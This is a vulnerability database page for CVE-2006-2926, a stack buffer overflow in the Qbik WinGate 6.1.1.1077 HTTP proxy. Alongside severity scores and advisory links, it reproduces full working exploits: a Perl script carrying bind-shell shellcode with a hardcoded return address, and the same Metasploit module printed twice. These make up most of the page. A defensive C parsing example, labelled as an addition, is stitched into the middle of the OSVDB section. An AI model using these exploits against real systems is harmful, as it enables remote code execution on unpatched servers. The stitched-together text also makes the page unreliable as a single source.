CVE-2006-2926
CVSS 7.5
Published: 2006-06-09 06:02:00
Last revised: 2011-03-07 21:37:18

[Original] Stack-based buffer overflow in the WWW Proxy Server of Qbik WinGate 6.1.1.1077 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long URL HTTP request.


[CNNVD] Qbik WinGate HTTP Request Buffer Overflow Vulnerability (CNNVD-200606-204)

        WinGate is an Internet sharing/proxy product that lets the hosts on a LAN share a single Internet account.
        WinGate's HTTP proxy contains a buffer overflow in its handling of specially crafted HTTP requests, which can lead to denial of service or execution of arbitrary code.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may be degraded or access to resources interrupted]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2926
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2926
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-204
(official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2006/2182
(UNKNOWN)  VUPEN  ADV-2006-2182
http://secunia.com/advisories/20483
(VENDOR_ADVISORY)  SECUNIA  20483
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046649.html
(UNKNOWN)  FULLDISC  20060607 MDaemon NOT vulnerable .. sorry for the advisory.. QBik Wingate is vulnerable
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046646.html
(UNKNOWN)  FULLDISC  20060607 MDaemon NOT vulnerable .. sorry for the advisory.. QBik Wingate is vulnerable
http://xforce.iss.net/xforce/xfdb/26970
(UNKNOWN)  XF  wingate-http-proxy-bo(26970)
http://www.securityfocus.com/bid/18312
(UNKNOWN)  BID  18312
http://securitytracker.com/id?1016239
(UNKNOWN)  SECTRACK  1016239

- Vulnerability information

Qbik WinGate HTTP Request Buffer Overflow Vulnerability
High severity  Buffer overflow
2006-06-09 00:00:00 2013-01-08 00:00:00
Remote
        WinGate is an Internet sharing/proxy product that lets the hosts on a LAN share a single Internet account.
        WinGate's HTTP proxy contains a buffer overflow in its handling of specially crafted HTTP requests, which can lead to denial of service or execution of arbitrary code.

- Advisories and patches

        The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:
        http://wingate.deerfield.com/

- Vulnerability information (1885)

QBik Wingate 6.1.1.1077 (POST) Remote Buffer Overflow Exploit (EDBID:1885)
Platform: windows   Type: remote
Date: 2006-06-07   Verified
Port: 80   Author: Kingcope
### *** Proof of concept (not for "in the wild" kiddies) ***
### QBik Wingate version 6.1.1.1077 remote exploit for Win2k SP4 (german)
### by kcope in 2006
###
use IO::Socket;

if ($ARGV[0] eq "")
{
 print "param1 = remote host";
 exit;
}

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58".
"\x4e\x46\x46\x32\x46\x52\x4b\x48\x45\x44\x4e\x33\x4b\x38\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x58".
"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x58".
"\x4f\x35\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34".
"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x30\x4e\x52\x4b\x58".
"\x49\x48\x4e\x46\x46\x32\x4e\x31\x41\x36\x43\x4c\x41\x43\x4b\x4d".
"\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x58\x42\x34\x4e\x30\x4b\x48".
"\x42\x47\x4e\x31\x4d\x4a\x4b\x58\x42\x54\x4a\x30\x50\x35\x4a\x46".
"\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46".
"\x43\x35\x48\x56\x4a\x46\x43\x53\x44\x53\x4a\x46\x47\x47\x43\x47".
"\x44\x33\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e".
"\x48\x36\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x30".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
"\x4f\x4f\x48\x4d\x43\x55\x43\x35\x43\x35\x43\x55\x43\x35\x43\x44".
"\x43\x35\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x41\x31".
"\x4e\x45\x48\x56\x43\x55\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a".
"\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x56\x42\x51".
"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x52".
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d".
"\x4a\x36\x45\x4e\x49\x54\x48\x48\x49\x54\x47\x35\x4f\x4f\x48\x4d".
"\x42\x35\x46\x35\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46".
"\x47\x4e\x49\x57\x48\x4c\x49\x57\x47\x35\x4f\x4f\x48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x56\x43\x46".
"\x4d\x46\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x38\x44\x4e\x41\x43\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x42\x50\x4f\x44\x54\x4e\x32".
"\x43\x39\x4d\x58\x4c\x47\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46".
"\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x54\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x55\x41\x35\x41\x35\x4c\x56".
"\x41\x30\x41\x55\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x56".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36".
"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x58\x47\x45\x4e\x4f".
"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d".
"\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '80',
                              Proto    => 'tcp');

$ret = "\x4b\x4f\x9e\x01";	# JMP ESI Win2k SP4 German
$x = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSAAAAUUUUVVVVWWWWXXXXYYYYZZZZ"
."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSBBBBUUUUVVVVWWWWXXXXYYYYZZZZ"
."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS".$ret."UUUUVVVVWWWWXXXXYYYYZZZZ"
."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSDDDDUUUUVVVVWWWWXXXXYYYYZZZZ"
."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSEEEEUUUUVVVVWWWWXXXXYYYYZZZZ";
$a = "A" x 2000 . $x . "\x90" x 100 . $shellcode;
print $sock "POST http://$a/ HTTP/1.0\r\n\r\n";


while (<$sock>) {
	print;	
}

# milw0rm.com [2006-06-07]
		

- Vulnerability information (16690)

Qbik WinGate WWW Proxy Server URL Processing Overflow (EDBID:16690)
Platform: windows   Type: remote
Date: 2010-09-20   Verified
Port: 80   Author: metasploit
##
# $Id: qbik_wingate_wwwproxy.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Qbik WinGate WWW Proxy Server URL Processing Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Qbik WinGate version
				6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the
				HTTP proxy service on port 80, a remote attacker could overflow
				a buffer and execute arbitrary code.
			},
			'Author'         => 'patrick',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2006-2926' ],
					[ 'OSVDB', '26214' ],
					[ 'BID', '18312' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00\x0a\x0d\x20+&=%\/\\\#;\"\':<>?",
					'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'WinGate 6.1.1.1077', { 'Ret' => 0x01991932 } ], # call esi
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Jun 07 2006',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(80)
			], self.class)
	end

	def check
		connect
		sock.put("GET /\r\n\r\n") # Malformed request to get proxy info
		banner = sock.get_once
		if (banner =~ /Server:\sWinGate\s6.1.1\s\(Build 1077\)/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buff = Rex::Text.rand_text_alphanumeric(3000)
		buff[1200, 1000] = payload.encoded # jmp here
		buff[2200, 5] = Rex::Arch::X86.jmp(-1005) # esi
		buff[2284, 4] = [target['Ret']].pack('V') #eip

		sploit  = "POST http://#{buff}/ HTTP/1.0\r\n\r\n"

		sock.put(sploit)
		sock.get_once(-1, 3)

		handler
		disconnect
	end

end
		

- Vulnerability information (F86449)

Qbik WinGate WWW Proxy Server URL Processing Overflow (PacketStormID:F86449)
Date: 2010-02-19 00:00:00
Author: patrick   Site: metasploit.com
Tags: exploit, remote, web, overflow, arbitrary
CVE-2006-2926

This Metasploit module exploits a stack overflow in Qbik WinGate version 6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the HTTP proxy service on port 80, a remote attacker could overflow a buffer and execute arbitrary code.

##
# $Id: qbik_wingate_wwwproxy.rb 8547 2010-02-18 15:58:26Z patrickw $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Qbik WinGate WWW Proxy Server URL Processing Overflow',
			'Description'    => %q{
		        This module exploits a stack overflow in Qbik WinGate version
			6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the 
			HTTP proxy service on port 80, a remote attacker could overflow
			a buffer and execute arbitrary code.
			},
			'Author'         => 'patrick',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 8547 $',
			'References'     => 
				[ 
					[ 'CVE', '2006-2926' ],
					[ 'OSVDB', '26214' ],
					[ 'BID', '18312' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00\x0a\x0d\x20+&=%\/\\\#;\"\':<>?",
					'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'WinGate 6.1.1.1077', { 'Ret' => 0x01991932 } ], # call esi
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Jun 07 2006',
			'DefaultTarget' => 0))

			register_options(
				[
					Opt::RPORT(80)
				], self.class)
	end

	def check
		connect
		sock.put("GET /\r\n\r\n") # Malformed request to get proxy info
		banner = sock.get_once
		if (banner =~ /Server:\sWinGate\s6.1.1\s\(Build 1077\)/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buff = Rex::Text.rand_text_alphanumeric(3000)
		buff[1200, 1000] = payload.encoded # jmp here
		buff[2200, 5] = Rex::Arch::X86.jmp(-1005) # esi
		buff[2284, 4] = [target['Ret']].pack('V') #eip

		sploit  = "POST http://#{buff}/ HTTP/1.0\r\n\r\n"

		sock.put(sploit)
		sock.get_once(-1, 3)

		handler
		disconnect
	end

end
    

- Vulnerability information

OSVDB 26214
WinGate WWW Proxy Server URL Processing Overflow
Location: Remote / Network Access   Attack type: Input Manipulation
Impact: Loss of Integrity   Solution: Unknown
Exploit: Public, Commercial   Disclosure: Uncoordinated

- Vulnerability description

Wingate is prone to an overflow condition. The proxy server fails to properly sanitize user-supplied input resulting in a stack overflow. With a specially crafted long URL, a remote attacker can potentially cause arbitrary code execution.
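The defect that the CNNVD summary and this OSVDB description both name is a request target copied into a fixed-size stack buffer without a length check. The following is an added example in C, not part of the original page and not WinGate's code: a bounded parser for the first line of a proxy request that refuses an overlong target instead of copying it. MAX_TARGET, parse_request_target, check_request and make_long_request are names and limits assumed here; the constructed request reproduces only the shape of the POST line seen in the public exploits, with a harmless run of 'A' characters in place of any payload.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical policy limit for the request target (URL) of a proxied request. */
#define MAX_TARGET 2048

enum parse_result {
    PARSE_OK = 0,
    PARSE_MALFORMED = 1,   /* fewer than three space-separated fields, or empty target */
    PARSE_TOO_LONG = 2     /* request target exceeds MAX_TARGET or the caller's buffer */
};

/*
 * The class of defect the advisory describes, shown here only as a comment:
 * a fixed-size stack buffer filled from the request target with no width limit.
 *
 *   char url[1024];
 *   sscanf(line, "%*s %s", url);   // a 3000-byte URL overruns url[] on the stack
 *
 * This is an illustration of the pattern, not a claim about WinGate's source.
 */

/* Hardened form: extract "METHOD SP target SP version" and copy the target
 * only if it fits both the policy limit and the destination buffer. */
enum parse_result parse_request_target(const char *line, char *out, size_t outlen)
{
    const char *sp1 = strchr(line, ' ');
    if (sp1 == NULL) return PARSE_MALFORMED;
    const char *target = sp1 + 1;
    const char *sp2 = strchr(target, ' ');
    if (sp2 == NULL) return PARSE_MALFORMED;
    size_t len = (size_t)(sp2 - target);
    if (len == 0) return PARSE_MALFORMED;
    if (len > MAX_TARGET || len >= outlen) return PARSE_TOO_LONG;
    memcpy(out, target, len);
    out[len] = '\0';
    return PARSE_OK;
}

/* Apply the check to a raw request buffer: only the first line is examined,
 * so an overlong target is rejected before any header parsing happens. */
enum parse_result check_request(const char *request, char *out, size_t outlen)
{
    const char *eol = strstr(request, "\r\n");
    size_t linelen = eol ? (size_t)(eol - request) : strlen(request);
    char *line = malloc(linelen + 1);
    if (line == NULL) return PARSE_MALFORMED;
    memcpy(line, request, linelen);
    line[linelen] = '\0';
    enum parse_result r = parse_request_target(line, out, outlen);
    free(line);
    return r;
}

/* Constructed test input: a POST line whose host part is n 'A' characters,
 * mirroring the shape (not the content) of the public proof-of-concept requests. */
char *make_long_request(size_t n)
{
    const char *prefix = "POST http://";
    const char *suffix = "/ HTTP/1.0\r\n\r\n";
    char *req = malloc(strlen(prefix) + n + strlen(suffix) + 1);
    if (req == NULL) return NULL;
    strcpy(req, prefix);
    memset(req + strlen(prefix), 'A', n);
    req[strlen(prefix) + n] = '\0';
    strcat(req, suffix);
    return req;
}

int main(void)
{
    char target[MAX_TARGET + 1];
    const char *normal = "GET http://example.com/index.html HTTP/1.0\r\nHost: example.com\r\n\r\n";
    printf("normal request: result %d, target %s\n",
           check_request(normal, target, sizeof target), target);

    char *big = make_long_request(3000);
    if (big != NULL) {
        printf("3000-byte host: result %d (2 = rejected as too long)\n",
               check_request(big, target, sizeof target));
        free(big);
    }
    return 0;
}
```

A proxy that applies this check at the request line also gains a cheap detection signal: every PARSE_TOO_LONG result is a request worth logging with its source address, since legitimate clients almost never send targets anywhere near the limit.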

- Timeline

2006-06-07 Unknown
2006-06-07 Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete
 

 
